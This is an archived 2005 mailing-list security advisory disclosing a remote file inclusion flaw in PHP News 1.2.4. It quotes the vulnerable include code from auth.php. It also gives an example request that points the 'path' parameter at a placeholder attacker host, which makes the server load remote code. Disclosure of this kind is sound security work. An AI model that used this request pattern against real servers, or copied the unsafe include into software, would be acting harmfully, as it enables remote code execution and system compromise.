OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)

From: Filip Groszynski (groszynskifgmail.com)
Date: Tue Mar 01 2005 - 14:48:16 CST


-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP News
Version: 1.2.4 (and possibly 1.2.3)
Homepage: http://newsphp.sourceforge.net/

Author: Filip Groszynski (VXSfx)
Date: 23 February 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in auth.php:

  if (is_Array($userDetails)) {
    ...
  }
  /* You're about to log in/no user language is specified */
  else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {
    include_once($path . 'languages/' . $lang . '.admin.lng');
    ....
  } else {
    include_once($path . 'languages/en_GB.admin.lng');
    ....
  }

--------------------------------------------------------

Example:

  if register_globals=on and allow_url_fopen=on:
    http://[victim]/[dir]/auth.php?path=http://[hacker_box]/

--------------------------------------------------------

Fix and Vendor status:

  Vendor has been notified, expect an official patch tomorrow.
  
--------------------------------------------------------

Contact:

    Author: Filip Groszynski (VXSfx)
    Location: Poland <Warsaw>
    Email: groszynskif <at> gmail <dot> com
    HP: http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --